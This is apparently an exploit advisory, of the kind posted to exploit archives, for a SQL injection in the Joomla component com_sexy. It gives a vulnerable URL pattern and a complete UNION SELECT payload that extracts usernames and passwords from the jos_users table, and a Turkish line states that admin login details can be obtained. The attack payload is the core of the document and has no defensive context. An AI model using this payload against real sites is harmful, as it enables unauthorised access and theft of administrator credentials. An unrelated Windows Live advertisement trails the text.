########################################################################

#       
 Joomla Component com_sexy SQL Injection 
Vulnerability                                      

########################################################################                                                      

#
 Author   :FL0RiX

#   

#Greez: All Tahkikat-ul Ahlak Family

#                                                    

#
 Name     : com_sexy

#                                                        

#
 Bug Type   : SQL Injection

#                                                        

#
 Infection    : Admin login bilgileri alinabilir.       

#                                                        

#
 Demo Vuln :

#

# site.com/index.php?option=com_sexy&view=girl&id=[EXPLOIT]

#

#
EXPLOIT :
null/**/union/**/select/**/1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47/**/from/**/jos_users--

#############################################################################

 		 	   		  

 		 	   		  
_________________________________________________________________
Windows Live: Arkadaşlarınız size e-posta gönderdiklerinde Flickr, Twitter ve Digg'deki hareketlerinizi görürler.
http://www.microsoft.com/windows/windowslive/see-it-in-action/social-network-basics.aspx?ocid=PID23461::T:WLMTAGL:ON:WL:tr-tr:SI_SB_3:092010